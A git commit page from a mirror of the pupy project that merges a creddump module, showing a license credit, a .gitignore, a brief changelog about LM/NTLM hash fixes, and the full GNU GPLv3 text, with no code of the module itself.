mirror of https://github.com/n1nj4sec/pupy.git
Merge creddump module
This commit is contained in:
commit
bb4e831750
2
LICENSE
2
LICENSE
|
@ -19,6 +19,8 @@ Pupy also uses some code source/libraries from other projects under different li
|
|||
http://videocapture.sourceforge.net/
|
||||
-psutil by Giampaolo Rodola under the BSD license
|
||||
https://github.com/giampaolo/psutil
|
||||
-For the external libraries in pupy/external/
|
||||
-creddump software is under GPLv3 license, you can see the full license terms in pupy/external/creddump7/COPYING.orig
|
||||
-For the transports :
|
||||
-obfsproxy software is under the 3-Clause BSD License. Copyright 2013 George Kadianakis
|
||||
-For the launchers :
|
||||
|
|
|
@ -0,0 +1,44 @@
|
|||
# Byte-compiled / optimized / DLL files
|
||||
__pycache__/
|
||||
*.py[cod]
|
||||
|
||||
# C extensions
|
||||
*.so
|
||||
|
||||
# Distribution / packaging
|
||||
.Python
|
||||
env/
|
||||
build/
|
||||
develop-eggs/
|
||||
dist/
|
||||
eggs/
|
||||
lib/
|
||||
lib64/
|
||||
parts/
|
||||
sdist/
|
||||
var/
|
||||
*.egg-info/
|
||||
.installed.cfg
|
||||
*.egg
|
||||
|
||||
# Installer logs
|
||||
pip-log.txt
|
||||
pip-delete-this-directory.txt
|
||||
|
||||
# Unit test / coverage reports
|
||||
htmlcov/
|
||||
.tox/
|
||||
.coverage
|
||||
.cache
|
||||
nosetests.xml
|
||||
coverage.xml
|
||||
|
||||
# Translations
|
||||
*.mo
|
||||
*.pot
|
||||
|
||||
# Django stuff:
|
||||
*.log
|
||||
|
||||
# Sphinx documentation
|
||||
docs/_build/
|
|
@ -0,0 +1,9 @@
|
|||
Version: 0.3 Date: 8/1/2012
|
||||
|
||||
* Fixed LM and NTLM Hash Corruption issue. Thanks to Jonathan Claudius.
|
||||
Closes Issue 3.
|
||||
|
||||
Version: 0.2 Date: 2/24/2011
|
||||
|
||||
* Fixed issue with wrong format specifier being used (L instead of I), which
|
||||
caused creddump to fail on 64-bit systems.
|
|
@ -0,0 +1,674 @@
|
|||
GNU GENERAL PUBLIC LICENSE
|
||||
Version 3, 29 June 2007
|
||||
|
||||
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
|
||||
Everyone is permitted to copy and distribute verbatim copies
|
||||
of this license document, but changing it is not allowed.
|
||||
|
||||
Preamble
|
||||
|
||||
The GNU General Public License is a free, copyleft license for
|
||||
software and other kinds of works.
|
||||
|
||||
The licenses for most software and other practical works are designed
|
||||
to take away your freedom to share and change the works. By contrast,
|
||||
the GNU General Public License is intended to guarantee your freedom to
|
||||
share and change all versions of a program--to make sure it remains free
|
||||
software for all its users. We, the Free Software Foundation, use the
|
||||
GNU General Public License for most of our software; it applies also to
|
||||
any other work released this way by its authors. You can apply it to
|
||||
your programs, too.
|
||||
|
||||
When we speak of free software, we are referring to freedom, not
|
||||
price. Our General Public Licenses are designed to make sure that you
|
||||
have the freedom to distribute copies of free software (and charge for
|
||||
them if you wish), that you receive source code or can get it if you
|
||||
want it, that you can change the software or use pieces of it in new
|
||||
free programs, and that you know you can do these things.
|
||||
|
||||
To protect your rights, we need to prevent others from denying you
|
||||
these rights or asking you to surrender the rights. Therefore, you have
|
||||
certain responsibilities if you distribute copies of the software, or if
|
||||
you modify it: responsibilities to respect the freedom of others.
|
||||
|
||||
For example, if you distribute copies of such a program, whether
|
||||
gratis or for a fee, you must pass on to the recipients the same
|
||||
freedoms that you received. You must make sure that they, too, receive
|
||||
or can get the source code. And you must show them these terms so they
|
||||
know their rights.
|
||||
|
||||
Developers that use the GNU GPL protect your rights with two steps:
|
||||
(1) assert copyright on the software, and (2) offer you this License
|
||||
giving you legal permission to copy, distribute and/or modify it.
|
||||
|
||||
For the developers' and authors' protection, the GPL clearly explains
|
||||
that there is no warranty for this free software. For both users' and
|
||||
authors' sake, the GPL requires that modified versions be marked as
|
||||
changed, so that their problems will not be attributed erroneously to
|
||||
authors of previous versions.
|
||||
|
||||
Some devices are designed to deny users access to install or run
|
||||
modified versions of the software inside them, although the manufacturer
|
||||
can do so. This is fundamentally incompatible with the aim of
|
||||
protecting users' freedom to change the software. The systematic
|
||||
pattern of such abuse occurs in the area of products for individuals to
|
||||
use, which is precisely where it is most unacceptable. Therefore, we
|
||||
have designed this version of the GPL to prohibit the practice for those
|
||||
products. If such problems arise substantially in other domains, we
|
||||
stand ready to extend this provision to those domains in future versions
|
||||
of the GPL, as needed to protect the freedom of users.
|
||||
|
||||
Finally, every program is threatened constantly by software patents.
|
||||
States should not allow patents to restrict development and use of
|
||||
software on general-purpose computers, but in those that do, we wish to
|
||||
avoid the special danger that patents applied to a free program could
|
||||
make it effectively proprietary. To prevent this, the GPL assures that
|
||||
patents cannot be used to render the program non-free.
|
||||
|
||||
The precise terms and conditions for copying, distribution and
|
||||
modification follow.
|
||||
|
||||
TERMS AND CONDITIONS
|
||||
|
||||
0. Definitions.
|
||||
|
||||
"This License" refers to version 3 of the GNU General Public License.
|
||||
|
||||
"Copyright" also means copyright-like laws that apply to other kinds of
|
||||
works, such as semiconductor masks.
|
||||
|
||||
"The Program" refers to any copyrightable work licensed under this
|
||||
License. Each licensee is addressed as "you". "Licensees" and
|
||||
"recipients" may be individuals or organizations.
|
||||
|
||||
To "modify" a work means to copy from or adapt all or part of the work
|
||||
in a fashion requiring copyright permission, other than the making of an
|
||||
exact copy. The resulting work is called a "modified version" of the
|
||||
earlier work or a work "based on" the earlier work.
|
||||
|
||||
A "covered work" means either the unmodified Program or a work based
|
||||
on the Program.
|
||||
|
||||
To "propagate" a work means to do anything with it that, without
|
||||
permission, would make you directly or secondarily liable for
|
||||
infringement under applicable copyright law, except executing it on a
|
||||
computer or modifying a private copy. Propagation includes copying,
|
||||
distribution (with or without modification), making available to the
|
||||
public, and in some countries other activities as well.
|
||||
|
||||
To "convey" a work means any kind of propagation that enables other
|
||||
parties to make or receive copies. Mere interaction with a user through
|
||||
a computer network, with no transfer of a copy, is not conveying.
|
||||
|
||||
An interactive user interface displays "Appropriate Legal Notices"
|
||||
to the extent that it includes a convenient and prominently visible
|
||||
feature that (1) displays an appropriate copyright notice, and (2)
|
||||
tells the user that there is no warranty for the work (except to the
|
||||
extent that warranties are provided), that licensees may convey the
|
||||
work under this License, and how to view a copy of this License. If
|
||||
the interface presents a list of user commands or options, such as a
|
||||
menu, a prominent item in the list meets this criterion.
|
||||
|
||||
1. Source Code.
|
||||
|
||||
The "source code" for a work means the preferred form of the work
|
||||
for making modifications to it. "Object code" means any non-source
|
||||
form of a work.
|
||||
|
||||
A "Standard Interface" means an interface that either is an official
|
||||
standard defined by a recognized standards body, or, in the case of
|
||||
interfaces specified for a particular programming language, one that
|
||||
is widely used among developers working in that language.
|
||||
|
||||
The "System Libraries" of an executable work include anything, other
|
||||
than the work as a whole, that (a) is included in the normal form of
|
||||
packaging a Major Component, but which is not part of that Major
|
||||
Component, and (b) serves only to enable use of the work with that
|
||||
Major Component, or to implement a Standard Interface for which an
|
||||
implementation is available to the public in source code form. A
|
||||
"Major Component", in this context, means a major essential component
|
||||
(kernel, window system, and so on) of the specific operating system
|
||||
(if any) on which the executable work runs, or a compiler used to
|
||||
produce the work, or an object code interpreter used to run it.
|
||||
|
||||
The "Corresponding Source" for a work in object code form means all
|
||||
the source code needed to generate, install, and (for an executable
|
||||
work) run the object code and to modify the work, including scripts to
|
||||
control those activities. However, it does not include the work's
|
||||
System Libraries, or general-purpose tools or generally available free
|
||||
programs which are used unmodified in performing those activities but
|
||||
which are not part of the work. For example, Corresponding Source
|
||||
includes interface definition files associated with source files for
|
||||
the work, and the source code for shared libraries and dynamically
|
||||
linked subprograms that the work is specifically designed to require,
|
||||
such as by intimate data communication or control flow between those
|
||||
subprograms and other parts of the work.
|
||||
|
||||
The Corresponding Source need not include anything that users
|
||||
can regenerate automatically from other parts of the Corresponding
|
||||
Source.
|
||||
|
||||
The Corresponding Source for a work in source code form is that
|
||||
same work.
|
||||
|
||||
2. Basic Permissions.
|
||||
|
||||
All rights granted under this License are granted for the term of
|
||||
copyright on the Program, and are irrevocable provided the stated
|
||||
conditions are met. This License explicitly affirms your unlimited
|
||||
permission to run the unmodified Program. The output from running a
|
||||
covered work is covered by this License only if the output, given its
|
||||
content, constitutes a covered work. This License acknowledges your
|
||||
rights of fair use or other equivalent, as provided by copyright law.
|
||||
|
||||
You may make, run and propagate covered works that you do not
|
||||
convey, without conditions so long as your license otherwise remains
|
||||
in force. You may convey covered works to others for the sole purpose
|
||||
of having them make modifications exclusively for you, or provide you
|
||||
with facilities for running those works, provided that you comply with
|
||||
the terms of this License in conveying all material for which you do
|
||||
not control copyright. Those thus making or running the covered works
|
||||
for you must do so exclusively on your behalf, under your direction
|
||||
and control, on terms that prohibit them from making any copies of
|
||||
your copyrighted material outside their relationship with you.
|
||||
|
||||
Conveying under any other circumstances is permitted solely under
|
||||
the conditions stated below. Sublicensing is not allowed; section 10
|
||||
makes it unnecessary.
|
||||
|
||||
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
|
||||
|
||||
No covered work shall be deemed part of an effective technological
|
||||
measure under any applicable law fulfilling obligations under article
|
||||
11 of the WIPO copyright treaty adopted on 20 December 1996, or
|
||||
similar laws prohibiting or restricting circumvention of such
|
||||
measures.
|
||||
|
||||
When you convey a covered work, you waive any legal power to forbid
|
||||
circumvention of technological measures to the extent such circumvention
|
||||
is effected by exercising rights under this License with respect to
|
||||
the covered work, and you disclaim any intention to limit operation or
|
||||
modification of the work as a means of enforcing, against the work's
|
||||
users, your or third parties' legal rights to forbid circumvention of
|
||||
technological measures.
|
||||
|
||||
4. Conveying Verbatim Copies.
|
||||
|
||||
You may convey verbatim copies of the Program's source code as you
|
||||
receive it, in any medium, provided that you conspicuously and
|
||||
appropriately publish on each copy an appropriate copyright notice;
|
||||
keep intact all notices stating that this License and any
|
||||
non-permissive terms added in accord with section 7 apply to the code;
|
||||
keep intact all notices of the absence of any warranty; and give all
|
||||
recipients a copy of this License along with the Program.
|
||||
|
||||
You may charge any price or no price for each copy that you convey,
|
||||
and you may offer support or warranty protection for a fee.
|
||||
|
||||
5. Conveying Modified Source Versions.
|
||||
|
||||
You may convey a work based on the Program, or the modifications to
|
||||
produce it from the Program, in the form of source code under the
|
||||
terms of section 4, provided that you also meet all of these conditions:
|
||||
|
||||
a) The work must carry prominent notices stating that you modified
|
||||
it, and giving a relevant date.
|
||||
|
||||
b) The work must carry prominent notices stating that it is
|
||||
released under this License and any conditions added under section
|
||||
7. This requirement modifies the requirement in section 4 to
|
||||
"keep intact all notices".
|
||||
|
||||
c) You must license the entire work, as a whole, under this
|
||||
License to anyone who comes into possession of a copy. This
|
||||
License will therefore apply, along with any applicable section 7
|
||||
additional terms, to the whole of the work, and all its parts,
|
||||
regardless of how they are packaged. This License gives no
|
||||
permission to license the work in any other way, but it does not
|
||||
invalidate such permission if you have separately received it.
|
||||
|
||||
d) If the work has interactive user interfaces, each must display
|
||||
Appropriate Legal Notices; however, if the Program has interactive
|
||||
interfaces that do not display Appropriate Legal Notices, your
|
||||
work need not make them do so.
|
||||
|
||||
A compilation of a covered work with other separate and independent
|
||||
works, which are not by their nature extensions of the covered work,
|
||||
and which are not combined with it such as to form a larger program,
|
||||
in or on a volume of a storage or distribution medium, is called an
|
||||
"aggregate" if the compilation and its resulting copyright are not
|
||||
used to limit the access or legal rights of the compilation's users
|
||||
beyond what the individual works permit. Inclusion of a covered work
|
||||
in an aggregate does not cause this License to apply to the other
|
||||
parts of the aggregate.
|
||||
|
||||
6. Conveying Non-Source Forms.
|
||||
|
||||
You may convey a covered work in object code form under the terms
|
||||
of sections 4 and 5, provided that you also convey the
|
||||
machine-readable Corresponding Source under the terms of this License,
|
||||
in one of these ways:
|
||||
|
||||
a) Convey the object code in, or embodied in, a physical product
|
||||
(including a physical distribution medium), accompanied by the
|
||||
Corresponding Source fixed on a durable physical medium
|
||||
customarily used for software interchange.
|
||||
|
||||
b) Convey the object code in, or embodied in, a physical product
|
||||
(including a physical distribution medium), accompanied by a
|
||||
written offer, valid for at least three years and valid for as
|
||||
long as you offer spare parts or customer support for that product
|
||||
model, to give anyone who possesses the object code either (1) a
|
||||
copy of the Corresponding Source for all the software in the
|
||||
product that is covered by this License, on a durable physical
|
||||
medium customarily used for software interchange, for a price no
|
||||
more than your reasonable cost of physically performing this
|
||||
conveying of source, or (2) access to copy the
|
||||
Corresponding Source from a network server at no charge.
|
||||
|
||||
c) Convey individual copies of the object code with a copy of the
|
||||
written offer to provide the Corresponding Source. This
|
||||
alternative is allowed only occasionally and noncommercially, and
|
||||
only if you received the object code with such an offer, in accord
|
||||
with subsection 6b.
|
||||
|
||||
d) Convey the object code by offering access from a designated
|
||||
place (gratis or for a charge), and offer equivalent access to the
|
||||
Corresponding Source in the same way through the same place at no
|
||||
further charge. You need not require recipients to copy the
|
||||
Corresponding Source along with the object code. If the place to
|
||||
copy the object code is a network server, the Corresponding Source
|
||||
may be on a different server (operated by you or a third party)
|
||||
that supports equivalent copying facilities, provided you maintain
|
||||
clear directions next to the object code saying where to find the
|
||||
Corresponding Source. Regardless of what server hosts the
|
||||
Corresponding Source, you remain obligated to ensure that it is
|
||||
available for as long as needed to satisfy these requirements.
|
||||
|
||||
e) Convey the object code using peer-to-peer transmission, provided
|
||||
you inform other peers where the object code and Corresponding
|
||||
Source of the work are being offered to the general public at no
|
||||
charge under subsection 6d.
|
||||
|
||||
A separable portion of the object code, whose source code is excluded
|
||||
from the Corresponding Source as a System Library, need not be
|
||||
included in conveying the object code work.
|
||||
|
||||
A "User Product" is either (1) a "consumer product", which means any
|
||||
tangible personal property which is normally used for personal, family,
|
||||
or household purposes, or (2) anything designed or sold for incorporation
|
||||
into a dwelling. In determining whether a product is a consumer product,
|
||||
doubtful cases shall be resolved in favor of coverage. For a particular
|
||||
product received by a particular user, "normally used" refers to a
|
||||
typical or common use of that class of product, regardless of the status
|
||||
of the particular user or of the way in which the particular user
|
||||
actually uses, or expects or is expected to use, the product. A product
|
||||
is a consumer product regardless of whether the product has substantial
|
||||
commercial, industrial or non-consumer uses, unless such uses represent
|
||||
the only significant mode of use of the product.
|
||||
|
||||
"Installation Information" for a User Product means any methods,
|
||||
procedures, authorization keys, or other information required to install
|
||||
and execute modified versions of a covered work in that User Product from
|
||||
a modified version of its Corresponding Source. The information must
|
||||
suffice to ensure that the continued functioning of the modified object
|
||||
code is in no case prevented or interfered with solely because
|
||||
modification has been made.
|
||||
|
||||
If you convey an object code work under this section in, or with, or
|
||||
specifically for use in, a User Product, and the conveying occurs as
|
||||
part of a transaction in which the right of possession and use of the
|
||||
User Product is transferred to the recipient in perpetuity or for a
|
||||
fixed term (regardless of how the transaction is characterized), the
|
||||
Corresponding Source conveyed under this section must be accompanied
|
||||
by the Installation Information. But this requirement does not apply
|
||||
if neither you nor any third party retains the ability to install
|
||||
modified object code on the User Product (for example, the work has
|
||||
been installed in ROM).
|
||||
|
||||
The requirement to provide Installation Information does not include a
|
||||
requirement to continue to provide support service, warranty, or updates
|
||||
for a work that has been modified or installed by the recipient, or for
|
||||
the User Product in which it has been modified or installed. Access to a
|
||||
network may be denied when the modification itself materially and
|
||||
adversely affects the operation of the network or violates the rules and
|
||||
protocols for communication across the network.
|
||||
|
||||
Corresponding Source conveyed, and Installation Information provided,
|
||||
in accord with this section must be in a format that is publicly
|
||||
documented (and with an implementation available to the public in
|
||||
source code form), and must require no special password or key for
|
||||
unpacking, reading or copying.
|
||||
|
||||
7. Additional Terms.
|
||||
|
||||
"Additional permissions" are terms that supplement the terms of this
|
||||
License by making exceptions from one or more of its conditions.
|
||||
Additional permissions that are applicable to the entire Program shall
|
||||
be treated as though they were included in this License, to the extent
|
||||
that they are valid under applicable law. If additional permissions
|
||||
apply only to part of the Program, that part may be used separately
|
||||
under those permissions, but the entire Program remains governed by
|
||||
this License without regard to the additional permissions.
|
||||
|
||||
When you convey a copy of a covered work, you may at your option
|
||||
remove any additional permissions from that copy, or from any part of
|
||||
it. (Additional permissions may be written to require their own
|
||||
removal in certain cases when you modify the work.) You may place
|
||||
additional permissions on material, added by you to a covered work,
|
||||
for which you have or can give appropriate copyright permission.
|
||||
|
||||
Notwithstanding any other provision of this License, for material you
|
||||
add to a covered work, you may (if authorized by the copyright holders of
|
||||
that material) supplement the terms of this License with terms:
|
||||
|
||||
a) Disclaiming warranty or limiting liability differently from the
|
||||
terms of sections 15 and 16 of this License; or
|
||||
|
||||
b) Requiring preservation of specified reasonable legal notices or
|
||||
author attributions in that material or in the Appropriate Legal
|
||||
Notices displayed by works containing it; or
|
||||
|
||||
c) Prohibiting misrepresentation of the origin of that material, or
|
||||
requiring that modified versions of such material be marked in
|
||||
reasonable ways as different from the original version; or
|
||||
|
||||
d) Limiting the use for publicity purposes of names of licensors or
|
||||
authors of the material; or
|
||||
|
||||
e) Declining to grant rights under trademark law for use of some
|
||||
trade names, trademarks, or service marks; or
|
||||
|
||||
f) Requiring indemnification of licensors and authors of that
|
||||
material by anyone who conveys the material (or modified versions of
|
||||
it) with contractual assumptions of liability to the recipient, for
|
||||
any liability that these contractual assumptions directly impose on
|
||||
those licensors and authors.
|
||||
|
||||
All other non-permissive additional terms are considered "further
|
||||
restrictions" within the meaning of section 10. If the Program as you
|
||||
received it, or any part of it, contains a notice stating that it is
|
||||
governed by this License along with a term that is a further
|
||||
restriction, you may remove that term. If a license document contains
|
||||
a further restriction but permits relicensing or conveying under this
|
||||
License, you may add to a covered work material governed by the terms
|
||||
of that license document, provided that the further restriction does
|
||||
not survive such relicensing or conveying.
|
||||
|
||||
If you add terms to a covered work in accord with this section, you
|
||||
must place, in the relevant source files, a statement of the
|
||||
additional terms that apply to those files, or a notice indicating
|
||||
where to find the applicable terms.
|
||||
|
||||
Additional terms, permissive or non-permissive, may be stated in the
|
||||
form of a separately written license, or stated as exceptions;
|
||||
the above requirements apply either way.
|
||||
|
||||
8. Termination.
|
||||
|
||||
You may not propagate or modify a covered work except as expressly
|
||||
provided under this License. Any attempt otherwise to propagate or
|
||||
modify it is void, and will automatically terminate your rights under
|
||||
this License (including any patent licenses granted under the third
|
||||
paragraph of section 11).
|
||||
|
||||
However, if you cease all violation of this License, then your
|
||||
license from a particular copyright holder is reinstated (a)
|
||||
provisionally, unless and until the copyright holder explicitly and
|
||||
finally terminates your license, and (b) permanently, if the copyright
|
||||
holder fails to notify you of the violation by some reasonable means
|
||||
prior to 60 days after the cessation.
|
||||
|
||||
Moreover, your license from a particular copyright holder is
|
||||
reinstated permanently if the copyright holder notifies you of the
|
||||
violation by some reasonable means, this is the first time you have
|
||||
received notice of violation of this License (for any work) from that
|
||||
copyright holder, and you cure the violation prior to 30 days after
|
||||
your receipt of the notice.
|
||||
|
||||
Termination of your rights under this section does not terminate the
|
||||
licenses of parties who have received copies or rights from you under
|
||||
this License. If your rights have been terminated and not permanently
|
||||
reinstated, you do not qualify to receive new licenses for the same
|
||||
material under section 10.
|
||||
|
||||
9. Acceptance Not Required for Having Copies.
|
||||
|
||||
You are not required to accept this License in order to receive or
|
||||
run a copy of the Program. Ancillary propagation of a covered work
|
||||
occurring solely as a consequence of using peer-to-peer transmission
|
||||
to receive a copy likewise does not require acceptance. However,
|
||||
nothing other than this License grants you permission to propagate or
|
||||
modify any covered work. These actions infringe copyright if you do
|
||||
not accept this License. Therefore, by modifying or propagating a
|
||||
covered work, you indicate your acceptance of this License to do so.
|
||||
|
||||
10. Automatic Licensing of Downstream Recipients.
|
||||
|
||||
Each time you convey a covered work, the recipient automatically
|
||||
receives a license from the original licensors, to run, modify and
|
||||
propagate that work, subject to this License. You are not responsible
|
||||
for enforcing compliance by third parties with this License.
|
||||
|
||||
An "entity transaction" is a transaction transferring control of an
|
||||
organization, or substantially all assets of one, or subdividing an
|
||||
organization, or merging organizations. If propagation of a covered
|
||||
work results from an entity transaction, each party to that
|
||||
transaction who receives a copy of the work also receives whatever
|
||||
licenses to the work the party's predecessor in interest had or could
|
||||
give under the previous paragraph, plus a right to possession of the
|
||||
Corresponding Source of the work from the predecessor in interest, if
|
||||
the predecessor has it or can get it with reasonable efforts.
|
||||
|
||||
You may not impose any further restrictions on the exercise of the
|
||||
rights granted or affirmed under this License. For example, you may
|
||||
not impose a license fee, royalty, or other charge for exercise of
|
||||
rights granted under this License, and you may not initiate litigation
|
||||
(including a cross-claim or counterclaim in a lawsuit) alleging that
|
||||
any patent claim is infringed by making, using, selling, offering for
|
||||
sale, or importing the Program or any portion of it.
|
||||
|
||||
11. Patents.
|
||||
|
||||
A "contributor" is a copyright holder who authorizes use under this
|
||||
License of the Program or a work on which the Program is based. The
|
||||
work thus licensed is called the contributor's "contributor version".
|
||||
|
||||
A contributor's "essential patent claims" are all patent claims
|
||||
owned or controlled by the contributor, whether already acquired or
|
||||
hereafter acquired, that would be infringed by some manner, permitted
|
||||
by this License, of making, using, or selling its contributor version,
|
||||
but do not include claims that would be infringed only as a
|
||||
consequence of further modification of the contributor version. For
|
||||
purposes of this definition, "control" includes the right to grant
|
||||
patent sublicenses in a manner consistent with the requirements of
|
||||
this License.
|
||||
|
||||
Each contributor grants you a non-exclusive, worldwide, royalty-free
|
||||
patent license under the contributor's essential patent claims, to
|
||||
make, use, sell, offer for sale, import and otherwise run, modify and
|
||||
propagate the contents of its contributor version.
|
||||
|
||||
In the following three paragraphs, a "patent license" is any express
|
||||
agreement or commitment, however denominated, not to enforce a patent
|
||||
(such as an express permission to practice a patent or covenant not to
|
||||
sue for patent infringement). To "grant" such a patent license to a
|
||||
party means to make such an agreement or commitment not to enforce a
|
||||
patent against the party.
|
||||
|
||||
If you convey a covered work, knowingly relying on a patent license,
|
||||
and the Corresponding Source of the work is not available for anyone
|
||||
to copy, free of charge and under the terms of this License, through a
|
||||
publicly available network server or other readily accessible means,
|
||||
then you must either (1) cause the Corresponding Source to be so
|
||||
available, or (2) arrange to deprive yourself of the benefit of the
|
||||
patent license for this particular work, or (3) arrange, in a manner
|
||||
consistent with the requirements of this License, to extend the patent
|
||||
license to downstream recipients. "Knowingly relying" means you have
|
||||
actual knowledge that, but for the patent license, your conveying the
|
||||
covered work in a country, or your recipient's use of the covered work
|
||||
in a country, would infringe one or more identifiable patents in that
|
||||
country that you have reason to believe are valid.
|
||||
|
||||
If, pursuant to or in connection with a single transaction or
|
||||
arrangement, you convey, or propagate by procuring conveyance of, a
|
||||
covered work, and grant a patent license to some of the parties
|
||||
receiving the covered work authorizing them to use, propagate, modify
|
||||
or convey a specific copy of the covered work, then the patent license
|
||||
you grant is automatically extended to all recipients of the covered
|
||||
work and works based on it.
|
||||
|
||||
A patent license is "discriminatory" if it does not include within
|
||||
the scope of its coverage, prohibits the exercise of, or is
|
||||
conditioned on the non-exercise of one or more of the rights that are
|
||||
specifically granted under this License. You may not convey a covered
|
||||
work if you are a party to an arrangement with a third party that is
|
||||
in the business of distributing software, under which you make payment
|
||||
to the third party based on the extent of your activity of conveying
|
||||
the work, and under which the third party grants, to any of the
|
||||
parties who would receive the covered work from you, a discriminatory
|
||||
patent license (a) in connection with copies of the covered work
|
||||
conveyed by you (or copies made from those copies), or (b) primarily
|
||||
for and in connection with specific products or compilations that
|
||||
contain the covered work, unless you entered into that arrangement,
|
||||
or that patent license was granted, prior to 28 March 2007.
|
||||
|
||||
Nothing in this License shall be construed as excluding or limiting
|
||||
any implied license or other defenses to infringement that may
|
||||
otherwise be available to you under applicable patent law.
|
||||
|
||||
12. No Surrender of Others' Freedom.
|
||||
|
||||
If conditions are imposed on you (whether by court order, agreement or
|
||||
otherwise) that contradict the conditions of this License, they do not
|
||||
excuse you from the conditions of this License. If you cannot convey a
|
||||
covered work so as to satisfy simultaneously your obligations under this
|
||||
License and any other pertinent obligations, then as a consequence you may
|
||||
not convey it at all. For example, if you agree to terms that obligate you
|
||||
to collect a royalty for further conveying from those to whom you convey
|
||||
the Program, the only way you could satisfy both those terms and this
|
||||
License would be to refrain entirely from conveying the Program.
|
||||
|
||||
13. Use with the GNU Affero General Public License.
|
||||
|
||||
Notwithstanding any other provision of this License, you have
|
||||
permission to link or combine any covered work with a work licensed
|
||||
under version 3 of the GNU Affero General Public License into a single
|
||||
combined work, and to convey the resulting work. The terms of this
|
||||
License will continue to apply to the part which is the covered work,
|
||||
but the special requirements of the GNU Affero General Public License,
|
||||
section 13, concerning interaction through a network will apply to the
|
||||
combination as such.
|
||||
|
||||
14. Revised Versions of this License.
|
||||
|
||||
The Free Software Foundation may publish revised and/or new versions of
|
||||
the GNU General Public License from time to time. Such new versions will
|
||||
be similar in spirit to the present version, but may differ in detail to
|
||||
address new problems or concerns.
|
||||
|
||||
Each version is given a distinguishing version number. If the
|
||||
Program specifies that a certain numbered version of the GNU General
|
||||
Public License "or any later version" applies to it, you have the
|
||||
option of following the terms and conditions either of that numbered
|
||||
version or of any later version published by the Free Software
|
||||
Foundation. If the Program does not specify a version number of the
|
||||
GNU General Public License, you may choose any version ever published
|
||||
by the Free Software Foundation.
|
||||
|
||||
If the Program specifies that a proxy can decide which future
|
||||
versions of the GNU General Public License can be used, that proxy's
|
||||
public statement of acceptance of a version permanently authorizes you
|
||||
to choose that version for the Program.
|
||||
|
||||
Later license versions may give you additional or different
|
||||
permissions. However, no additional obligations are imposed on any
|
||||
author or copyright holder as a result of your choosing to follow a
|
||||
later version.
|
||||
|
||||
15. Disclaimer of Warranty.
|
||||
|
||||
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
|
||||
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
|
||||
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
|
||||
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
|
||||
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
|
||||
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
|
||||
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
|
||||
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
|
||||
|
||||
16. Limitation of Liability.
|
||||
|
||||
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
|
||||
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
|
||||
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
|
||||
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
|
||||
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
|
||||
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
|
||||
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
|
||||
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
|
||||
SUCH DAMAGES.
|
||||
|
||||
17. Interpretation of Sections 15 and 16.
|
||||
|
||||
If the disclaimer of warranty and limitation of liability provided
|
||||
above cannot be given local legal effect according to their terms,
|
||||
reviewing courts shall apply local law that most closely approximates
|
||||
an absolute waiver of all civil liability in connection with the
|
||||
Program, unless a warranty or assumption of liability accompanies a
|
||||
copy of the Program in return for a fee.
|
||||
|
||||
END OF TERMS AND CONDITIONS
|
||||
|
||||
How to Apply These Terms to Your New Programs
|
||||
|
||||
If you develop a new program, and you want it to be of the greatest
|
||||
possible use to the public, the best way to achieve this is to make it
|
||||
free software which everyone can redistribute and change under these terms.
|
||||
|
||||
To do so, attach the following notices to the program. It is safest
|
||||
to attach them to the start of each source file to most effectively
|
||||
state the exclusion of warranty; and each file should have at least
|
||||
the "copyright" line and a pointer to where the full notice is found.
|
||||
|
||||
<one line to give the program's name and a brief idea of what it does.>
|
||||
Copyright (C) <year> <name of author>
|
||||
|
||||
This program is free software: you can redistribute it and/or modify
|
||||
it under the terms of the GNU General Public License as published by
|
||||
the Free Software Foundation, either version 3 of the License, or
|
||||
(at your option) any later version.
|
||||
|
||||
This program is distributed in the hope that it will be useful,
|
||||
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
GNU General Public License for more details.
|
||||
|
||||
You should have received a copy of the GNU General Public License
|
||||
along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
Also add information on how to contact you by electronic and paper mail.
|
||||
|
||||
If the program does terminal interaction, make it output a short
|
||||
notice like this when it starts in an interactive mode:
|
||||
|
||||
<program> Copyright (C) <year> <name of author>
|
||||
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
|
||||
This is free software, and you are welcome to redistribute it
|
||||
under certain conditions; type `show c' for details.
|
||||
|
||||
The hypothetical commands `show w' and `show c' should show the appropriate
|
||||
parts of the General Public License. Of course, your program's commands
|
||||
might be different; for a GUI interface, you would use an "about box".
|
||||
|
||||
You should also get your employer (if you work as a programmer) or school,
|
||||
if any, to sign a "copyright disclaimer" for the program, if necessary.
|
||||
For more information on this, and how to apply and follow the GNU GPL, see
|
||||
<http://www.gnu.org/licenses/>.
|
||||
|
||||
The GNU General Public License does not permit incorporating your program
|
||||
into proprietary programs. If your program is a subroutine library, you
|
||||
may consider it more useful to permit linking proprietary applications with
|
||||
the library. If this is what you want to do, use the GNU Lesser General
|
||||
Public License instead of this License. But first, please read
|
||||
<http://www.gnu.org/philosophy/why-not-lgpl.html>.
|
|
@ -0,0 +1,182 @@
|
|||
